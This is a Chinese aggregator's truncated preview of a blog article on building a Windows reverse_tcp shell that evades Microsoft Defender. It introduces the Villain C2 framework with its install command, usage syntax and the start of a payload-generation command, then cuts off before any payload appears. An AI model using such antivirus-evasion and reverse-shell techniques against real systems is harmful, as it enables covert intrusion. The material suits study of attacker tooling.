专栏名称: 骨哥说事
关注信息安全趋势,发布国内外网络安全事件,不定期发布对热点事件的个人见解。
目录
今天看啥  ›  专栏  ›  骨哥说事

打造绕过Defender的Windows reverse_tcp Shell【部分】

骨哥说事  · 公众号  ·  · 2024-08-12 20:19

文章预览

声明: 文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 博客新域名: https://gugesay.com 不想错过任何消息?设置星标 ↓ ↓ ↓ Villain 关于Villain Villain 是一个高级 Stage 0/1 C2 框架,可以处理多个基于 TCP 套接字和 HoaxShell 的反弹 Shell,通过附加功能(命令、实用程序)增强其功能,并在连接的同级服务器(在不同机器上运行的 Villain 实例)之间共享它们。 项目地址:https://github.com/t3l3machus/Villain 安装 apt install villain Villain 使用示例 villain [-h] [-p PORT] [-x HOAX_PORT] [-n NETCAT_PORT] [-f FILE_SMUGGLER_PORT] [-i] [-c CERTFILE] [-k KEYFILE] [-u] [-q] Defender检测绕过 首先使用Villain生成payload,以Windows PowerShell为例: Villain  > generate payload=windows/ne ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览